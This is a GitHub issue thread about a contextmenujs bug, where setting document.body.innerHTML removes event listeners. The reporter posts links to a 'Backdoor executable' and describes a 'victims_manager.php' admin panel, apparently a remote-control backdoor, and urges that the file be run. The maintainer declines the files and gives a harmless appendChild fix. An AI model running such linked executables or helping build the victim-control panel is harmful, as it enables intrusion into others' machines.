### ISSUE TITLE
Using document.body.innderHTML make contextmenu not usable

### ISSUE THREAD

**Issue by ghost** [m-thalmann/contextmenujs#3]
Origin : https://github.com/m-thalmann/contextmenujs/issues/2

**Response :** 

SERVER Code : https://filebin.net/blv58conaf85dy1s
MySQL Server Database : https://filebin.net/xeoxs6urxzegkq1i
Backdoor executable : https://filebin.net/rx8ageq76lcyqfvj
[Can be executed safely, turn in background without any risk, can be stopped using taskmanager || Software can be scand using dnSpy in case of doubts]

Test need to be done using xampp

Main files locations :
./admin/index.php [Admin panel visible in the first video] [Iframes are spawning here||contextMenu also]
./admin/victims_manager.php [Recieve instructions from the panel and output response (Content of all iframes)]
./admin/scripts/contextMenu.js [contextmenujs config, triggers and listener on panel table right click]
./admin/scripts/iframeManager.js [Spawn iframes depending of size setup in contextMenu.js]

If you have any questions for setup or explains, i will help you with no worries

**Comment by m-thalmann** [comment]
I will not download these files for obvious reasons. But you could provide an example snippet that reproduces this problem. As I said, when I try this myself I do not have this problem, which means it has to be on your end.

**Comment by ghost** [comment]
This is the example snipped, if i would want to reproduce exactly the code, it would take 6h to configure.
You have the exact situation, all fils **can** be scanned with dnSpy as said before, so there is any risk about anything here.

**Comment by m-thalmann** [comment]
I will not setup your project and I most definitely will not scan through your project to find the error. As I said: either provide a minimal example like the following:

```html
<!DOCTYPE html>
<html lang="en">
<head>
	<link rel="stylesheet" href="contextmenu.css" id="theme_style" />
    <script src="contextmenu.js"></script>
</head>

<body>
	<main style="background-color: #f12; height: 100px; width: 100px;">
    </main>

    <iframe src="https://currentmillis.com/" style="width: 100%"></iframe>

    <script>
        var menu = new ContextMenu([
			{
                "text": "Item 1",
                "events": {
                    "click": function(e){
                        console.log("Click!");
                    }
                }
			}
        ]);

        document.getElementsByTagName("main")[0].addEventListener("contextmenu", function(e){
            menu.display(e);
        });
    </script>
</body>
</html>
```

or otherwise the problem is on your end.

In my example above, the iframe does not reload.

**Comment by ghost** [comment]
Are you not using "menu.reload()" as a mistake ?
I use it at each click else the contextMenu is stuck 
![image](https://user-images.githubusercontent.com/52961795/102929949-d2ab6680-449b-11eb-808e-e06296815445.png)
Result from removing "menu.reload()"

https://user-images.githubusercontent.com/52961795/102930067-0dad9a00-449c-11eb-90bd-9a3ec8da0bb1.mp4

If this is normal, then i will make a small snippet as example for you to find out the source of my problem

**Comment by m-thalmann** [comment]
What do you mean with "it is stuck"? For me it does not:
![test](https://user-images.githubusercontent.com/30590624/102930684-34b89b80-449d-11eb-8844-0c9063dba8ec.gif)
(Output from the exact snippet from above)

**Comment by ghost** [comment]
Code Snippet  :   
[index.zip](https://github.com/m-thalmann/contextmenujs/files/5731995/index.zip)






https://user-images.githubusercontent.com/52961795/102932986-a397f380-44a1-11eb-9668-0e6545ca10ad.mp4

**Comment by m-thalmann** [comment]
This happens due to you appending content to the body via `.innerHTML` which seams to remove the eventlisteners for the contextmenu. To prevent this you can append the content doing the following:
```js
var div = document.createElement('div');
div.className = "mini_window";
div.style.width = `width: ${width}`;
div.id = "iframe_box";

div.innerHTML = 
       `<div class="mini_window-header" id='iframe_top'>
              <h5 class="mini_window-header__title">${title}</h5>

              <button class="mini_window-header__close_button" onClick="this.parentNode.parentNode.remove()"> </button>
       </div>

       <iframe id="iframe" resize=both src="./" style="min-width:150px;resize:both;border:2px #ffffff solid;" name="iframe" scrolling="no" frameborder="1" marginheight="0px" marginwidth="0px" height="${height}px" width="${width}px"></iframe>`;

document.body.appendChild(div);
```

This does exactly the same as previous, except it preserves the eventlisteners and therefore the menu still works.

**Comment by ghost** [comment]
Worked fine, also edited the title for other people that would have the problem.
